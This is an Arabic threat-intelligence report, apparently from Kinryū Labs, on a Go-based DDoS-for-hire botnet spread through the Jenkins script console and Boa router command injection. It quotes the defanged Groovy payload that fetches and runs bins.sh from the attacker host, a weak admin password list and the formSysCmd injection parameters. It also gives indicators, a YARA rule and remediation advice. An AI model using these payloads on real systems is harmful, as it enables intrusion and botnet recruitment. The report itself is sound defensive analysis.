malware · botnet · ddos · golang · iot · jenkins · honeypot · mirai

شبكة بوت DDoS للإيجار عابرة للأنظمة مكتوبة بلغة Go

حلّلت Kinryū Labs الملف bot.exe، وهو بناء Windows لشبكة بوت DDoS مُصرَّفة بلغة Go ومُوزَّعة كعُدّة إسقاط من 11 ثنائياً و13 معمارية، ومُسلَّمة عبر حملة استغلال لوحدة تحكم سكربتات Jenkins امتدّت عدة أيام. كشف الاستطلاع لمضيف التخزين المؤقت عن واجهة برمجة تطبيقات DDoS للإيجار حيّة ومُصادَق عليها، وقناة أوامر SSH مكتوبة بلغة Go، وعائلة من سلالة Mirai مُستضافة على المضيف نفسه. نقدّر بثقة عالية أن هذه عملية DDoS تجارية للإيجار.

بقلم Davis Zheng·

TLP:CLEAR. أُجيز للنشر العام. التُقطت العيّنة وعُدّة إسقاطها بواسطة شبكة مستشعرات مصائد Kinryū Labs أثناء حملة استغلال لـ Jenkins امتدّت عدة أيام ورُصدت عبر عدة مستشعرات. حُلِّلت الثنائيات المُلتقَطة تحليلاً ساكناً ولم تُشغَّل؛ اتّسم مضيف التخزين المؤقت للمشغّل باستطلاع خارجي فعّال (تعداد الخدمات، وسرد FTP المجهول، وسبر غير مُصادَق عليه لواجهة برمجة تطبيقات مكشوفة)، دون تجاوز أي مصادقة. مؤشرات المهاجم مُبطَّلة المخالب (defanged).

ملخص تنفيذي

  • 13بناء معماري، 11 ثنائياً فريداً
  • 5طرق DDoS مسمّاة، إضافة إلى واجهة برمجة تطبيقات للإيجار
  • 3عناوين IP مصدر منسّقة في نطاق /22 واحد
  • 2عائلتا شبكات بوت على مضيف واحد

bot.exe هو بناء Windows x86-64 لشبكة بوت DDoS مُصرَّفة بلغة Go ومُوزَّعة كعُدّة إسقاط متعددة المعماريات. يجلب سكربت صدفة مرافق، bins.sh، ثلاثة عشر بناءً معمارياً، أحد عشر منها فريدة بعد إزالة التكرار، تغطّي x86 بنسختَي 32 و64 بت، وأربعة أطياف ARM، وARM64، وAndroid ARM64، وMIPS بترتيبَي البايت الكبير والصغير، إلى جانب ثنائي Windows. وصلت العُدّة إلى شبكة المصائد عبر استغلال خادم Jenkins مكشوف.

تضمّن البرمجية الخبيثة خمس طرق إغراق (flood) مسمّاة (HTTP، ومصافحة TLS، وICMP، وTLS مباشر، وطريقة حجمية موسومة بـ VOULT)، وإغراق HTTP يبدّل سلاسل User-Agent الخاصة بالمتصفح ورؤوس اللغة المحلية كي يشبه حركة المرور المشروعة، وحمولات حقن أوامر تستهدف خادم Boa على أجهزة RealTek SDK بغرض الانتشار الذاتي. كشف الاستطلاع لمضيف التخزين المؤقت عند 185.226.93[.]242 عن واجهة برمجة تطبيقات DDoS للإيجار مُصادَق عليها على المنفذ 3333، وخدمة SSH مُنفَّذة بلغة Go على المنفذ 2222 تعمل قناةَ أوامر، وخدمة FTP مجهولة تخزّن مؤقتاً عائلة شبكة بوت ثانية من سلالة Mirai/Gafgyt.

تقدّر Kinryū Labs بـثقة عالية أن bot.exe جزء من شبكة بوت DDoS خبيثة ذاتية الانتشار ومتعددة المعماريات تُدار كخدمة تجارية للإيجار. ثلاثة نتائج تحمل التقييم: سلاسل طرق الهجوم والاستغلال الخاصة بالثنائي ذاته؛ وواجهة برمجة تطبيقات للإيجار حيّة على مضيف التخزين المؤقت للمشغّل تتحقّق من معطيات المهمة وتتطلّب مصادقة؛ وقياسات مصائد لحملة مستدامة متعددة العقد تسلّم العُدّة.

التقييمات الرئيسية
  • bot.exe شبكة بوت DDoS عابرة للأنظمة مكتوبة بلغة Go. خمس سلاسل سجل لطرق إغراق متمايزة تحمل معطيات الهدف والمدة، إلى جانب آلية انتحال هوية المتصفح ودعم SOCKS5، جميعها في سلاسل غير مُبهَّمة ومؤيَّدة بواجهة برمجة التطبيقات الحيّة.
  • العملية تُدار كخدمة DDoS تجارية للإيجار. يكشف مضيف التخزين المؤقت عن واجهة برمجة تطبيقات على المنفذ 3333 تتحقّق من معطيات المهمة (user وpsw وhost وmethod وtime وport) وترفض بيانات الاعتماد غير الصالحة.
  • شبكة البوت تنتشر ذاتياً عبر حقن أوامر IoT. يحمل الثنائي حمولة حقن أوامر Boa formSysCmd، ومسار تخمين شامل (brute-force) لتسجيل دخول جهاز التوجيه، والدالتين المُصدَّرتين loginDevice وloginDeviceCaptcha، حاقناً سطر الإسقاط الواحد ذاته المُسجَّل في سجلات المصائد.
  • عناوين IP المصدر الثلاثة مشغّل واحد. سلّمت ثلاثة عناوين في 185.226.92[.]0/22 حمولات متطابقة بتوقيت منسّق وقائمة بيانات اعتماد مشتركة، وتقدّم عناوين IP التسليم والتخزين المؤقت مفاتيح مضيف SSH متطابقة، ما يشير إلى مضيف واحد أو صور مُستنسَخة.

التسليم: حملة مستدامة على وحدة تحكم سكربتات Jenkins

سُلِّمت العُدّة عبر استغلال نسخة Jenkins مكشوفة على الإنترنت. سجّلت قياسات المصائد أسلوباً ثابتاً من خطوتين: طلب GET /crumbIssuer/api/json لاسترجاع رمز CSRF، متبوعاً بـ POST /script يحمل حمولة وحدة تحكم سكربتات Groovy. كانت الحمولة متطابقة عبر المحاولات، وهي هنا مُبطَّلة المخالب:

println new ProcessBuilder('sh','-c',
  'cd /tmp; wget hxxp://185.226.93[.]242:1001/bins.sh;
   curl -O hxxp://185.226.93[.]242:1001/bins.sh;
   chmod 777 *; ./bins.sh'
).redirectErrorStream(true).start().text

حملت الطلبات رأس Authorization: Basic يدوّر قاموساً قصيراً من كلمات المرور الرقمية الضعيفة لحساب admin (admin:1123 وadmin:123451 وadmin:1231231 وadmin:1111111 وadmin:12345123)، وهي بصمة قائمة بيانات اعتماد آلية لا مصادقة موجّهة.

امتدّت الحملة عبر عدة أيام في موجات متكرّرة:

  • الموجة 1أولى عمليات السبر: فحص crumb الخاص بـ CSRF متبوعاً بتنفيذ Groovy عن بُعد (RCE)، من عنوان IP التخزين المؤقت وعنوان ثانٍ في الكتلة ذاتها.
  • الالتقاطاستُرجع bins.sh وجميع المتغيّرات الثلاثة عشر عند مستشعرَين على بُعد نحو أربع عشرة ساعة، متطابقة بايتاً ببايت عندهما.
  • موجات لاحقةاستغلال متوازٍ من عناوين IP المصدر الثلاثة جميعها في غضون دقائق من بعضها، مع تدوير User-Agent.

دوّرت طلبات الاستغلال مجموعة كبيرة من User-Agent متصفّح واقعية، بينما استخدم مسح الاستطلاع الباحث عن أهداف Jenkins إضافية (جلب /login متبوعاً بدفقة سريعة من طلبات /script) القيمة الافتراضية Go-http-client/1.1. تركب User-Agent المنتحَلة حمولات الاستغلال؛ أما الماسح فيستخدم عميل Go الأصلي لشبكة البوت. شارك مضيف التخزين المؤقت وC2 ذاته في الاستغلال، فبنية الهجوم وبنية الاستضافة غير منفصلتين.

البرمجية الخبيثة: قاعدة كود Go واحدة، أحد عشر ثنائياً

كتابة البوت بلغة Go تتيح لقاعدة كود واحدة التصريف التبادلي لكل هدف يريده المشغّل. يجوب برنامج الإسقاط خطّ المنتج كاملاً، فيجلب كل بناء بـ wget ثم بـ curl كبديل احتياطي، ويجعله قابلاً للتنفيذ، ويشغّله، ويحذفه. تتضمّن العُدّة ملف .exe لـ Windows، يمرّره برنامج الإسقاط الخاص بـ Linux مع ذلك عبر chmod +x، وتشير البنية المُولَّدة للسكربت إلى خط أنابيب بناء وسرد. بعد إزالة التكرار تنخفض الثلاثة عشر بناءً إلى أحد عشر ثنائياً فريداً: بناءا x86 وi386 متطابقان، وكذلك بناءا ARM العام وARMv7. يمتدّ انتشار المعماريات، من MIPS وARM القديم مروراً بـ Android، ليسم شبكة بوت موجّهة إلى أجهزة التوجيه والكاميرات وسائر الأجهزة المُضمَّنة؛ ويحمل بناء Windows الكود ذاته إلى الحواسيب المكتبية والخوادم.

الثنائي غير مُحزَّم (packed) (تقع إنتروبيا مقاطع PE بين 5.4 و6.3) وغير مُجرَّد من الرموز (stripped) (معرّف بناء Go ورموز وقت التشغيل سليمة)، فقدراته ماثلة في سلاسل عادية. الطابع الزمني للتصريف مصفَّر، وهو أمر طبيعي لبناءات Go.

خمس طرق إغراق مسمّاة في سلاسل سجل الثنائي، كلٌّ مُنسَّق بهدف ومدة: إغراق “HTTP (Optimized)”، وإغراق استنزاف “Handshake” على TLS/TCP، وإغراق “PING” على ICMP، وإغراق جلسة “TLS+” مباشر، وطريقة “VOULT”، حجمية ويُرجَّح أنها قائمة على UDP. حاضرة خيارات طبقة التطبيق وطبقة الشبكة كلتاهما.

إغراق HTTP مبنيّ ليمرّ كحركة مرور مشروعة. يدوّر أكثر من عشر سلاسل User-Agent متصفّح عبر Chrome وEdge وOpera وFirefox وSafari على Windows وmacOS وiPad وAndroid؛ وخمس عشرة لغة محلية في Accept-Language؛ ورؤوس البصمة sec-fetch-* وsec-ch-ua-* التي تفحصها خدمات التخفيف. يضبط Referer من مجموعة صغيرة من المواقع عالية السمعة (google.com وreddit.com وfacebook.com وbing.com وtwitter.com وfbi.gov). أحد المدخلات في مجموعة User-Agent هو السلسلة الحرفية Hello World، وهي عنصر نائب لمطوّر يصنع بصمة كشف نظيفة لأن لا عميل مشروعاً يرسلها.

يستهدف الانتشار خادم Boa، وهو عفريت HTTP مُضمَّن صغير لا يزال يُشحن على كثير من أجهزة توجيه وكاميرات RealTek SDK. يحمل الثنائي حمولة حقن أوامر ضد معالج formSysCmd في Boa، ومسار تخمين شامل لتسجيل الدخول ضد واجهات إدارة أجهزة التوجيه، مع حقول بيانات اعتماد JSON والدالتين المُصدَّرتين loginDevice وloginDeviceCaptcha. الأمر المحقون هو سطر الإسقاط الواحد، فيصبح الجهاز المُختَرق نقطةَ تسليم الجهاز التالي.

وحدات Go المُورَّدة (vendored) جميعها حزم golang.org/x قياسية، دون أي إطار C2 من طرف ثالث مرتبط بها. تشمل chacha20poly1305 وhttp2/hpack وdns/dnsmessage وhttp/httpproxy، متطابقةً مع القدرات المُلاحَظة: قناة مشفّرة مُصادَق عليها، وHTTP/2، وDNS خام، وبروكسي SOCKS5 (السلاسل socks5 وsocks connect وsocksUsernamePassword حاضرة). يُسترجع إعداد C2 وقت التشغيل من hxxp://<C2>/config.dat؛ والعنوان الوحيد المُضمَّن بالكود في الثنائي هو مضيف التخزين المؤقت.

القيادة والتحكّم وبنية التخزين المؤقت

كشف الاستطلاع لمضيف التخزين المؤقت عن الخدمات التالية:

المنفذالخدمةالغرض
21/tcpvsftpd 3.0.3، تسجيل الدخول المجهول مُفعَّلتخزين مؤقت للبرمجية الخبيثة (العائلة الثانية، أدناه)
22/tcpOpenSSH 9.2p1 (Debian)وصول المشغّل
1001/tcpخادم Go net/httpالتخزين المؤقت الأساسي: يقدّم bins.sh والمتغيّرات
2222/tcpGo SSH (SSH-2.0-Go)قناة أوامر البوت
3333/tcpخادم Go net/httpواجهة برمجة تطبيقات DDoS للإيجار

نتيجتان تدعمان تقييم الإيجار. يقدّم عنوان IP التسليم ومضيف التخزين المؤقت مفاتيح مضيف SSH متطابقة من نوع ED25519 وRSA وECDSA، ما يضعهما على الجهاز ذاته أو على صور مُستنسَخة من قالب واحد، وتقدّم خدمة Go SSH على المنفذ 2222 مفتاحاً متمايزاً عن OpenSSH النظامي على المنفذ 22، ما يسمها تطبيقاً منفصلاً لا إعادة توجيه. ترفض واجهة برمجة التطبيقات على المنفذ 3333 طلباً تنقصه المعطيات (user وpsw وhost وmethod وtime/duration وport) وتُرجِع فشل مصادقة لبيانات اعتماد اختبارية، مع إرجاع كل المسارات الأخرى 404. هذه هي الواجهة الدنيا المُصادَق عليها لكل طلب لمنصّة booter تجارية، تعمل على بنية تحتية حيّة.

عائلة ثانية على المضيف ذاته

تخزّن خدمة FTP المجهولة عائلة شبكة بوت منفصلة، يُشار إليها هنا بـ “boatnet” نسبةً إلى أسماء ملفاتها. يستخدم برنامج إسقاطها (ohshit1.sh) عميل ftpget من BusyBox، ويعيد تسمية كل ثنائي إلى WTF قبل التنفيذ، ويطلق البناءات في الخلفية عبر خمس عشرة معمارية، بما فيها أهداف مُضمَّنة نادرة (ARC وm68k وSH4 وSPARC) من سلالة Mirai/Gafgyt. الثنائيات ELF مُصرَّفة بلغة C، ومُجرَّدة من الرموز، ومُحزَّمة (إنتروبيا 7.6 إلى 7.9 دون رقم UPX السحري، ما يدلّ على مُحزِّم مخصّص)، فقليل ينجو من المراجعة الساكنة. تسبق آثار boatnet عُدّة bot.exe وتشغّل قاعدة كود غير ذات صلة، فمضيف واحد يخزّن مؤقتاً عائلتَي شبكات بوت متمايزتين.

الاستضافة

يقع عنوانا IP المهاجم كلاهما في 185.226.92[.]0/22، المُسجَّل لمزوّد VPS مقرّه تركيا (اسم الشبكة BIGCORE-US، AS205196 / AS57152) عبر RIPE NCC، بجهة اتصال إساءة استخدام [email protected]. نحدّد مزوّد الاستضافة لأغراض الإبلاغ ولا نطرح أي ادّعاء بشأن هوية المشغّل.

مؤشرات الاختراق

بنية المهاجم مُبطَّلة المخالب. بصمات العيّنات وسلاسل الكشف تحمل قيماً حيّة بحكم التصميم.

الشبكة

المؤشرالسياق
185.226.93[.]242مضيف التخزين المؤقت + C2؛ وأيضاً ماسح نشط
185.226.92[.]110الماسح الأساسي / عقدة التسليم
185.226.92[.]173الماسح الثانوي
185.226.92[.]0/22تخصيص الاستضافة (BIGCORE، AS205196). حظر محيطي معقول
185.226.93[.]242:1001التخزين المؤقت على HTTP (bins.sh + المتغيّرات)
185.226.93[.]242:2222قناة أوامر Go SSH
185.226.93[.]242:3333واجهة برمجة تطبيقات DDoS للإيجار (/api، مُقيَّدة بالمعطيات)
185.226.93[.]242:21FTP مجهول، تخزين boatnet المؤقت
hxxp://<C2>/config.datنمط استرجاع إعداد C2 وقت التشغيل
/boafrm/formSysCmd، /boafrm/formLoginمعرّفات موارد Boa RCE والتخمين الشامل لتسجيل الدخول في الانتشار الصادر
مفتاح مضيف SSH (ED25519) …INAjVN5fIlxTHxT4R3yqTS8…مشترك عبر عنوانَي IP التسليم وC2؛ مؤشر ارتكاز (pivot)

الملفات

الملفSHA-256
bot.exe (Windows x64)4de4621f66780e1400bf3c55f146f84f6d77bbdd3a401451f3b7f16d674e3804
bins.sh (برنامج الإسقاط)15f92c41e5f8ee6b2f6b7cfd14d2fc61bd4163a45d79c20a4d7974cb0fe68cf6
boatnet.0eem0a9ali (i386)6fbd581a3a6f1152de4090f0d5387258a905c76fb58f0d58191eae5f3d30421b
boatnet.0t25ax67hl (x86-64)920b114325d372c387616ff971947b42087dc018bb4812cdf2adae6005c1382d
  • bot.exe MD5 / SHA-1 / imphash: 88efcb919000efb700a814fc23e31e3f / 6817eae057adf831892995f514fca36c489fdd10 / 211e227000a1da3333aab2bad5282318
  • Go Build ID: euzQMg9dNAAGDYR0FLBy/NBlt-oXDyZN8MvU4a30l/8dJq21Cvc4y0nwb3h6ja/kYq23qQRIeCoh9BwgyGK
بصمات عُدّة الإسقاط كاملةً (11 فريدة عبر 13 بناءً)
البناءSHA-256الحجم (بايت)
amd643261921456e347fb40c2d0a605db61ee058020872486c844653696d03ebb7b705,919,119
x86 / i386575eba4fffff7419985e4eef8e010c6c0a7dae00b23db45de895547faf2cc3985,787,832
arm / armv7l9e6da804ae9ca0a07348e92d99416bcf3fc650ccbdf4a9b4db34f6d546ddfb105,898,424
arm5365e22a1c1a77e5d88727ab6f8050548aa2170d3c2b4c8adcdfc1eb89eaea5825,898,424
arm634186fba4b5a9c640517020d43a1ba70bdf59f1163867917950e2f7459a0839f5,898,424
arm64ada33a0316d364d1d3be6d23ca2e590c16db7d845795619935e42e53f9293f6b5,579,151
android_arm647d7210719451068df7906798f37ec8fd86a0dfc3df10bfa939e3d436c72346cf6,169,144
mips9200aac4a356190252dc6131f6b60d59367c522537258838c017266d0e3b48f56,619,351
mipsle14d62a04e97f20f2d087dcf41fb44e5597cd3d6fbe4a597229d6b3c79c8ecde76,619,351
bot.exe4de4621f66780e1400bf3c55f146f84f6d77bbdd3a401451f3b7f16d674e38046,020,608

آثار المضيف وبيانات الاعتماد

  • قاموس التخمين الشامل لحساب admin في Jenkins: 1123 و123451 و1231231 و1111111 و12345123.
  • ohshit1.sh (برنامج إسقاط boatnet) وثنائي مُعاد تسميته إلى WTF قبل التنفيذ.
  • User-Agent مميّزة: Hello World (إغراق HTTP للبوت) وGo-http-client/1.1 (المسح الذاتي للبوت).

سلوكية

  • GET /crumbIssuer/api/json في Jenkins متبوعاً بـ POST /script يحمل حمولة Groovy ProcessBuilder('sh','-c', …) تجلب bins.sh.
  • طلبات صادرة إلى مضيف تحت /config.dat، مسبوقةً بسطر سجل Connecting to CNC....
  • طلب وارد POST /boafrm/formSysCmd بـ sysCmdselect=5 وجسم wget … bins.sh.

الكشف

السلاسل مستقرّة وغير مُبهَّمة، فالتواقيع مباشرة. قاعدة YARA أدناه مرشّحة مبنية من سلاسل مُتحقَّق منها؛ تحقّق منها قبل النشر.

rule go_ddos_bot_multiarch_candidate
{
    meta:
        description = "Candidate: Go-compiled multi-arch DDoS botnet (bot.exe family)"
        author      = "Kinryu Labs honeypot CTI"
        reference   = "4de4621f...e3804"  // full SHA-256 in the IOC table
        tlp         = "CLEAR"

    strings:
        $cnc  = "Connecting to CNC..." ascii
        $cfg  = "/config.dat" ascii
        $atk1 = "HTTP (Optimized) Attack started" ascii
        $atk2 = "VOULT attack" ascii
        $atk3 = "Handshake Attack started" ascii
        $boa  = "/boafrm/formSysCmd" ascii
        $iot  = "loginDeviceCaptcha" ascii
        $drop = "bins.sh" ascii

    condition:
        ($cnc and $cfg) or ($boa and $drop) or (2 of ($atk1, $atk2, $atk3) and $iot)
}

الكشف الشبكي:

  • Jenkins: نبّه على أجسام POST /script المحتوية على ProcessBuilder مع wget/curl إلى عنوان IP خام، خصوصاً حين تُسبَق بـ GET /crumbIssuer/api/json.
  • انتشار IoT: content:"/boafrm/formSysCmd"; content:"sysCmdselect=5";.
  • البنية التحتية: احظر 185.226.92[.]0/22، الذي يغطّي عناوين التسليم وC2، ونبّه على الاتصالات الصادرة إلى المنافذ 1001 و2222 و3333 في ذلك النطاق.

المعالجة

  • لا تعرّض Jenkins للإنترنت. ضعه خلف مصادقة وعزل شبكي، وعطّل وحدة تحكم السكربتات لغير المسؤولين، وعامل خادم بناء يمكن الوصول إليه كخطر اختراق للمضيف كله. كان هذا ناقل التسليم.
  • افرض بيانات اعتماد Jenkins قوية وقيّد معدّل المصادقة. اتّكأت الحملة على قاموس قصير من كلمات المرور الرقمية الضعيفة لحساب admin.
  • افصل أو استبدل أجهزة التوجيه وأجهزة IoT القائمة على RealTek/Boa، واحظر الوصول الخارجي إلى واجهات إدارتها. هذه هي هدف انتشار شبكة البوت.
  • احظر تخصيص الاستضافة (185.226.92[.]0/22) عند المحيط ونبّه على معرّف موارد Boa RCE ونمط استرجاع config.dat.
  • رشّح الخروج (egress). مضيف يصل إلى عنوان IP خام على المنفذ 1001 لسحب ملفات مسمّاة بالمعمارية، أو يتصل بالمنفذ 2222 أو 3333 في ذلك النطاق، شاذّ وقابل للالتقاط حيث يغيب كشف المضيف.
  • أبلغ عن البنية التحتية. يمكن الإبلاغ عن واجهة برمجة تطبيقات DDoS للإيجار والبرمجية الخبيثة المُخزَّنة على FTP إلى جهة اتصال إساءة الاستخدام لدى مزوّد الاستضافة ([email protected]).

مخطط MITRE ATT&CK

التكتيكالتقنية
Initial AccessT1190 Exploit Public-Facing Application (وحدة تحكم سكربتات Jenkins؛ Boa formSysCmd للانتشار)
Credential AccessT1110.001 Brute Force: Password Guessing (Jenkins admin); T1110.004 Credential Stuffing (تسجيل دخول IoT)
ExecutionT1059 Command and Scripting Interpreter (Groovy عبر وحدة تحكم السكربتات؛ برنامج إسقاط صدفة Unix)
DiscoveryT1046 Network Service Scanning (المسح الذاتي لـ Jenkins/IoT); T1082 System Information Discovery; T1057 Process Discovery
Defense EvasionT1036 Masquerading (تدوير User-Agent المتصفّح؛ إعادة تسمية boatnet إلى WTF)
Command and ControlT1071.001 Web Protocols (config.dat); T1573 Encrypted Channel (ChaCha20-Poly1305؛ Go SSH على 2222); T1571 Non-Standard Port (1001/2222/3333); T1090.001 Internal Proxy: SOCKS
Lateral Movement / DeliveryT1105 Ingress Tool Transfer (تخزين مؤقت متعدد المعماريات)
ImpactT1498.001 Direct Network Flood (PING، VOULT); T1498.002 Reflection Amplification (استنزاف المصافحة)

المنهجية وملاحظات

  • النطاق: تحليل ساكن للثنائيات المُلتقَطة، التي لم تُشغَّل، واستطلاع خارجي فعّال لمضيف التخزين المؤقت (تعداد الخدمات واللافتات، وسرد FTP المجهول، وسبر غير مُصادَق عليه لواجهة برمجة التطبيقات على المنفذ 3333). لم تُتجاوَز أي مصادقة.
  • قاعدة YARA مرشّحة مبنية من سلاسل مُتحقَّق منها؛ تحقّق منها قبل النشر. ثنائيات boatnet مُحزَّمة وأنتجت سلاسل قليلة.
  • العيّنات (عُدّة bot.exe، وبرنامج الإسقاط، وآثار boatnet) متاحة للباحثين والمدافعين الآخرين عند الطلب. راسل [email protected] مع ملاحظة قصيرة عمّن أنت وما حاجتك إليها.
How to cite
Kinryū Labs (2026). شبكة بوت DDoS للإيجار عابرة للأنظمة مكتوبة بلغة Go. https://kinryu.sh/ar/reports/go-ddos-botnet-for-hire/